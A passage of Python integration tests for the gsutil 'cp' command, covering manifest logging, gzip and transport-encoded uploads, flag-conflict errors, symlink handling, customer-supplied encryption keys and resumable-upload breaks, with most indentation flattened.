end_date = datetime.datetime.strptime(results['End'], date_format)
self.assertEqual(end_date > start_date, True)
if self.RunGsUtil == testcase.GsUtilIntegrationTestCase.RunGsUtil:
# Check that we didn't do automatic parallel uploads - compose doesn't
      # calculate the MD5 hash. Since RunGsUtil is overridden in
# TestCpParallelUploads to force parallel uploads, we can check which
# method was used.
self.assertEqual(results['Md5'], 'rL0Y20zC+Fzt72VPzMSk2A==')
self.assertEqual(int(results['Source Size']), 3)
self.assertEqual(int(results['Bytes Transferred']), 3)
self.assertEqual(results['Result'], 'OK')
@SequentialAndParallelTransfer
def test_cp_manifest_download(self):
"""Tests downloading with a manifest file."""
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'')
logpath = self.CreateTempFile(contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(
['cp', '-L', logpath, suri(key_uri), fpath], return_stdout=True)
with open(logpath, 'r') as f:
lines = f.readlines()
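    # On Python 3, non-ASCII source/destination paths may be written to the
    # manifest as repr'd byte strings (e.g. b'...'); the block below decodes
    # those fields back to text before validating them.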
if six.PY3:
decode_lines = []
for line in lines:
if line.startswith("b'"):
some_strs = line.split(',')
line_parts = []
for some_str in some_strs:
if some_str.startswith("b'"):
line_parts.append(ast.literal_eval(some_str).decode(UTF8))
else:
line_parts.append(some_str)
decode_lines.append(','.join(line_parts))
else:
decode_lines.append(line)
lines = decode_lines
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
self.assertEqual(results[0][:5], '%s://' % self.default_provider) # source
self.assertEqual(results[1][:7], 'file://') # destination
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results[2], date_format)
end_date = datetime.datetime.strptime(results[3], date_format)
self.assertEqual(end_date > start_date, True)
self.assertEqual(int(results[6]), 3) # Source Size
# Bytes transferred might be more than 3 if the file was gzipped, since
# the minimum gzip header is 10 bytes.
self.assertGreaterEqual(int(results[7]), 3) # Bytes Transferred
self.assertEqual(results[8], 'OK') # Result
@SequentialAndParallelTransfer
def test_copy_unicode_non_ascii_filename(self):
key_uri = self.CreateObject()
# Try with and without resumable upload threshold, to ensure that each
# scenario works. In particular, resumable uploads have tracker filename
# logic.
file_contents = b'x' * START_CALLBACK_PER_BYTES * 2
fpath = self.CreateTempFile(file_name='Аудиоархив', contents=file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', '1')]):
# fpath_bytes = fpath.encode(UTF8)
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)],
return_stdout=True,
force_gsutil=True)
      self.assertEqual(stdout.encode('ascii'), file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold',
str(START_CALLBACK_PER_BYTES * 3))]):
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)],
return_stdout=True,
force_gsutil=True)
      self.assertEqual(stdout.encode('ascii'), file_contents)
  # Note: We originally implemented a test
  # (test_copy_invalid_unicode_filename) verifying that invalid unicode
  # filenames were skipped, but it turns out os.walk() on macOS doesn't have
  # problems with such files (so that test failed). Given that, we decided to
  # remove the test.
@SequentialAndParallelTransfer
def test_gzip_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
# Test that copying specifying only 2 of the 3 prefixes gzips the correct
# files, and test that including whitespace in the extension list works.
self.RunGsUtil([
'cp', '-z', 'js, html',
os.path.join(tmpdir, 'test.*'),
suri(bucket_uri)
])
self.AssertNObjectsInBucket(bucket_uri, 3)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-j flag to target specific extensions.
"""
def _create_test_data(): # pylint: disable=invalid-name
"""Setup the bucket and local data to test with.
Returns:
Triplet containing the following values:
bucket_uri: String URI of cloud storage bucket to upload mock data
to.
tmpdir: String, path of a temporary directory to write mock data to.
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
"""
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uris = []
for filename in ('test.html', 'test.js', 'test.txt'):
local_uris.append(
self.CreateTempFile(file_name=filename,
tmpdir=tmpdir,
contents=contents))
return (bucket_uri, tmpdir, local_uris)
def _upload_test_data(tmpdir, bucket_uri): # pylint: disable=invalid-name
"""Upload local test data.
Args:
tmpdir: String, path of a temporary directory to write mock data to.
bucket_uri: String URI of cloud storage bucket to upload mock data to.
Returns:
stderr: String output from running the gsutil command to upload mock
data.
"""
stderr = self.RunGsUtil([
'-D', 'cp', '-j', 'js, html',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)
],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 3)
return stderr
def _assert_sent_compressed(local_uris, stderr): # pylint: disable=invalid-name
"""Ensure the correct files were marked for compression.
Args:
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
stderr: String output from running the gsutil command to upload mock
data.
"""
local_uri_html, local_uri_js, local_uri_txt = local_uris
assert_base_string = 'Using compressed transport encoding for file://{}.'
self.assertIn(assert_base_string.format(local_uri_html), stderr)
self.assertIn(assert_base_string.format(local_uri_js), stderr)
self.assertNotIn(assert_base_string.format(local_uri_txt), stderr)
def _assert_stored_uncompressed(bucket_uri, contents=b'x' * 10000): # pylint: disable=invalid-name
"""Ensure the files are not compressed when they are stored in the bucket.
Args:
bucket_uri: String with URI for bucket containing uploaded test data.
        contents: Byte string that is stored in each file in the bucket.
"""
local_uri_html = suri(bucket_uri, 'test.html')
local_uri_js = suri(bucket_uri, 'test.js')
local_uri_txt = suri(bucket_uri, 'test.txt')
fpath4 = self.CreateTempFile()
for uri in (local_uri_html, local_uri_js, local_uri_txt):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
# Get mock data, run tests
bucket_uri, tmpdir, local_uris = _create_test_data()
stderr = _upload_test_data(tmpdir, bucket_uri)
_assert_sent_compressed(local_uris, stderr)
_assert_stored_uncompressed(bucket_uri)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_non_resumable(self):
"""Test non resumable, gzip encoded files upload correctly in parallel.
This test generates a small amount of data (e.g. 100 chars) to upload.
Due to the small size, it will be below the resumable threshold,
and test the behavior of non-resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 100
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_resumable(self):
"""Test resumable, gzip encoded files upload correctly in parallel.
    This test generates a large amount of data (halt_size characters) to
    upload. Due to the large size, it will be above the resumable threshold
    and will exercise the behavior of resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SequentialAndParallelTransfer
def test_gzip_all_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test', tmpdir=tmpdir, contents=contents)
# Test that all files are compressed.
self.RunGsUtil(
['cp', '-Z',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, 4)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
uri4 = suri(bucket_uri, 'test')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri4], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3, uri4):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_all_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-J flag to target all files.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uri1 = self.CreateTempFile(file_name='test.txt',
tmpdir=tmpdir,
contents=contents)
local_uri2 = self.CreateTempFile(file_name='test',
tmpdir=tmpdir,
contents=contents)
# Upload the data.
stderr = self.RunGsUtil(
['-D', 'cp', '-J',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 2)
# Ensure the correct files were marked for compression.
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri1),
stderr)
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri2),
stderr)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
remote_uri1 = suri(bucket_uri, 'test.txt')
remote_uri2 = suri(bucket_uri, 'test')
fpath4 = self.CreateTempFile()
for uri in (remote_uri1, remote_uri2):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
def test_both_gzip_options_error(self):
"""Test that mixing compression flags error."""
cases = (
# Test with -Z and -z
['cp', '-Z', '-z', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-z', 'html, js', '-Z', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -z and -Z options together is invalid.', stderr)
def test_both_gzip_transport_encoding_options_error(self):
"""Test that mixing transport encoding flags error."""
cases = (
# Test with -J and -j
['cp', '-J', '-j', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-j', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j and -J options together is invalid.', stderr)
def test_combined_gzip_options_error(self):
"""Test that mixing transport encoding and compression flags error."""
    cases = (['cp', '-Z', '-j', 'html, js', 'a.js', 'b.js'],
             ['cp', '-J', '-z', 'html, js', 'a.js', 'b.js'],
             ['cp', '-j', 'html, js', '-Z', 'a.js', 'b.js'],
             ['cp', '-z', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j/-J and -z/-Z options together is invalid.',
stderr)
def test_upload_with_subdir_and_unexpanded_wildcard(self):
fpath1 = self.CreateTempFile(file_name=('tmp', 'x', 'y', 'z'))
bucket_uri = self.CreateBucket()
wildcard_uri = '%s*' % fpath1[:-5]
stderr = self.RunGsUtil(
['cp', '-R', wildcard_uri, suri(bucket_uri)], return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
def test_upload_does_not_raise_with_content_md5_and_check_hashes_never(self):
    fpath1 = self.CreateTempFile(file_name='foo')
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
stderr = self.RunGsUtil(
['-h', 'Content-MD5: invalid-md5', 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
@SequentialAndParallelTransfer
def test_cp_object_ending_with_slash(self):
"""Tests that cp works with object names ending with slash."""
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/',
contents=b'dir')
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/def',
contents=b'def')
self.AssertNObjectsInBucket(bucket_uri, 2)
self.RunGsUtil(['cp', '-R', suri(bucket_uri), tmpdir])
# Check that files in the subdir got copied even though subdir object
# download was skipped.
with open(os.path.join(tmpdir, bucket_uri.bucket_name, 'abc', 'def')) as f:
      self.assertEqual('def', '\n'.join(f.readlines()))
def test_cp_without_read_access(self):
"""Tests that cp fails without read access to the object."""
# TODO: With 401's triggering retries in apitools, this test will take
# a long time. Ideally, make apitools accept a num_retries config for this
# until we stop retrying the 401's.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Use @Retry as hedge against bucket listing eventual consistency.
self.AssertNObjectsInBucket(bucket_uri, 1)
if self.default_provider == 's3':
expected_error_regex = r'AccessDenied'
else:
expected_error_regex = r'Anonymous \S+ do(es)? not have'
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(['cp', suri(object_uri), 'foo'],
return_stderr=True,
expected_status=1)
self.assertRegex(stderr, expected_error_regex)
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_r_minus_e(self):
"""Tests that cp -e -r ignores symlinks when recursing."""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
# Create a valid file, since cp expects to copy at least one source URL
# successfully.
self.CreateTempFile(tmpdir=tmpdir, contents=b'foo')
subdir = os.path.join(tmpdir, 'subdir')
os.mkdir(subdir)
os.mkdir(os.path.join(tmpdir, 'missing'))
# Create a blank directory that is a broken symlink to ensure that we
# don't fail recursive enumeration with a bad symlink.
os.symlink(os.path.join(tmpdir, 'missing'), os.path.join(subdir, 'missing'))
os.rmdir(os.path.join(tmpdir, 'missing'))
self.RunGsUtil(['cp', '-r', '-e', tmpdir, suri(bucket_uri)])
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_e(self):
fpath_dir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=fpath_dir)
fpath2 = os.path.join(fpath_dir, 'cp_minus_e')
bucket_uri = self.CreateBucket()
os.symlink(fpath1, fpath2)
# We also use -c to continue on errors. One of the expanded glob entries
# should be the symlinked file, which should throw a CommandException since
# no valid (non-symlinked) files could be found at that path; we don't want
# the command to terminate if that's the first file we attempt to copy.
stderr = self.RunGsUtil([
'-m', 'cp', '-e',
'%s%s*' % (fpath_dir, os.path.sep),
suri(bucket_uri, 'files')
],
return_stderr=True)
self.assertIn('Copying file', stderr)
if self._use_gcloud_storage:
self.assertIn('Skipping symlink', stderr)
else:
self.assertIn('Skipping symbolic link', stderr)
# Ensure that top-level arguments are ignored if they are symlinks. The file
# at fpath1 should be successfully copied, then copying the symlink at
# fpath2 should fail.
stderr = self.RunGsUtil(
['cp', '-e', '-r', fpath1, fpath2,
suri(bucket_uri, 'files')],
return_stderr=True,
expected_status=1)
self.assertIn('Copying file', stderr)
if self._use_gcloud_storage:
self.assertIn('Skipping symlink', stderr)
self.assertIn('URL matched no objects or files: %s' % fpath2, stderr)
else:
self.assertIn('Skipping symbolic link', stderr)
self.assertIn('CommandException: No URLs matched: %s' % fpath2, stderr)
def test_cp_multithreaded_wildcard(self):
"""Tests that cp -m works with a wildcard."""
num_test_files = 5
tmp_dir = self.CreateTempDir(test_files=num_test_files)
bucket_uri = self.CreateBucket()
wildcard_uri = '%s%s*' % (tmp_dir, os.sep)
self.RunGsUtil(['-m', 'cp', wildcard_uri, suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, num_test_files)
@SequentialAndParallelTransfer
def test_cp_duplicate_source_args(self):
"""Tests that cp -m works when a source argument is provided twice."""
object_contents = b'edge'
object_uri = self.CreateObject(object_name='foo', contents=object_contents)
tmp_dir = self.CreateTempDir()
self.RunGsUtil(['-m', 'cp', suri(object_uri), suri(object_uri), tmp_dir])
with open(os.path.join(tmp_dir, 'foo'), 'rb') as in_fp:
contents = in_fp.read()
    # Contents should not be duplicated.
self.assertEqual(contents, object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object(self):
"""Tests downloading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath)])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), object_contents)
# If multiple keys are supplied and one is correct, download should succeed.
fpath2 = self.CreateTempFile()
boto_config_for_test2 = [
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY3),
('GSUtil', 'decryption_key1', TEST_ENCRYPTION_KEY2),
('GSUtil', 'decryption_key2', TEST_ENCRYPTION_KEY1)
]
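    # gsutil tries the configured encryption_key first and then each
    # decryption_key entry when decrypting, so listing the correct key as
    # decryption_key2 here should still allow the download to succeed.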
with SetBotoConfigForTest(boto_config_for_test2):
self.RunGsUtil(['cp', suri(object_uri), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), object_contents)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_download_encrypted_object_without_key(self):
"""Tests downloading an encrypted object without the necessary key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
object_contents = b'bar'
object_uri = self.CreateObject(object_name='foo',
contents=object_contents,
encryption_key=TEST_ENCRYPTION_KEY1)
fpath = self.CreateTempFile()
stderr = self.RunGsUtil(
['cp', suri(object_uri), suri(fpath)],
expected_status=1,
return_stderr=True)
self.assertIn(
'Missing decryption key with SHA256 hash %s' %
TEST_ENCRYPTION_KEY1_SHA256_B64, stderr)
@SkipForS3('gsutil doesn\'t support S3 customer-supplied encryption keys.')
@SequentialAndParallelTransfer
def test_cp_upload_encrypted_object(self):
"""Tests uploading an encrypted object."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri = suri(bucket_uri, 'foo')
file_contents = b'bar'
fpath = self.CreateTempFile(contents=file_contents, file_name='foo')
boto_config_for_test = [('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
# Uploading the object should succeed.
with SetBotoConfigForTest(boto_config_for_test):
self.RunGsUtil(['cp', suri(fpath), suri(bucket_uri)])
self.AssertObjectUsesCSEK(object_uri, TEST_ENCRYPTION_KEY1)
with SetBotoConfigForTest(boto_config_for_test):
# Reading the object back should succeed.
fpath2 = self.CreateTempFile()
self.RunGsUtil(['cp', suri(bucket_uri, 'foo'), suri(fpath2)])
with open(fpath2, 'rb') as f:
self.assertEqual(f.read(), file_contents)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_break(self):
"""Tests that an encrypted upload resumes after a connection break."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
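    # --testcallbackfile points at this pickled handler; gsutil invokes it
    # during the transfer, and the handler halts the upload partway through
    # (emitting the 'Artifically halting upload' message asserted below) to
    # simulate a dropped connection.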
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
with open(fpath, 'rb') as fp:
self.assertIn(CalculateB64EncodedMd5FromContents(fp), stdout)
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_different_key(self):
"""Tests that an encrypted upload resume uses original encryption key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload with multiple keys, including the original.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'decryption_key1',
TEST_ENCRYPTION_KEY2),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Object should have the original key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY1)
@SkipForS3('No resumable upload or encryption support for S3.')
def test_cp_resumable_upload_encrypted_object_missing_key(self):
"""Tests that an encrypted upload does not resume without original key."""
if self.test_api == ApiSelector.XML:
return unittest.skip(
'gsutil does not support encryption with the XML API')
bucket_uri = self.CreateBucket()
object_uri_str = suri(bucket_uri, 'foo')
file_contents = b'a' * self.halt_size
fpath = self.CreateTempFile(contents=file_contents)
boto_config_for_test = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY1)]
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest(boto_config_for_test):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath, object_uri_str
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
# Resume the upload without the original key.
boto_config_for_test2 = [('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'encryption_key', TEST_ENCRYPTION_KEY2)]
with SetBotoConfigForTest(boto_config_for_test2):
stderr = self.RunGsUtil(['cp', fpath, object_uri_str], return_stderr=True)
self.assertNotIn('Resuming upload', stderr)
self.assertIn('does not match current encryption key', stderr)
self.assertIn('Restarting upload from scratch', stderr)
# Object should have the new key.
self.AssertObjectUsesCSEK(object_uri_str, TEST_ENCRYPTION_KEY2)
def _ensure_object_unencrypted(self, object_uri_str):
"""Strongly consistent check that the object is unencrypted."""
stdout = self.RunGsUtil(['stat', object_uri_str], return_stdout=True)
self.assertNotIn('Encryption Key', stdout)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_break(self):
"""Tests that an upload can be resumed after a connection break."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
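    # Lowering resumable_threshold to 1 KiB forces this halt_size-byte upload
    # to use the resumable protocol, so it can be interrupted and then resumed
    # by the second cp invocation below.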
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, fpath,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['cp', fpath, suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_cp_resumable_upload_gzip_encoded_break(self):
"""Tests that a gzip encoded upload can be resumed."""
# Setup the bucket and local data. File contents are randomized to prevent
# them from compressing below the resumable-threshold and failing the test.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
local_uri = self.CreateTempFile(file_name='test.txt', contents=contents)
# Configure boto
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(True, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'-D', 'cp', '-J', '--testcallbackfile', test_callback_file, local_uri,
suri(bucket_uri)
],
expected_status=1,
return_stderr=True)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
self.assertIn('Artifically halting upload', stderr)
stderr = self.RunGsUtil(['-D', 'cp', '-J', local_uri,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Resuming upload', stderr)
# Ensure the progress logger is still seeing a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
temp_uri = self.CreateTempFile()
remote_uri = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', remote_uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', remote_uri, suri(temp_uri)])
with open(temp_uri, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No resumable upload support for S3.')
def test_cp_resumable_upload_retry(self):
"""Tests that a resumable upload completes with one retry."""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * self.halt_size)
# TODO: Raising an httplib or socket error blocks bucket teardown
# in JSON for 60-120s on a multiprocessing lock acquire. Figure out why;
# until then, raise an apitools retryable exception.
if self.test_api == ApiSelector.XML:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(5, http_client.BadStatusLine, (
'unused',))))
else:
test_callback_file = self.CreateTempFile(contents=pickle.dumps(
_ResumableUploadRetryHandler(
5, apitools_exceptions.BadStatusCodeError, ('unused', 'unused',
'unused'))))
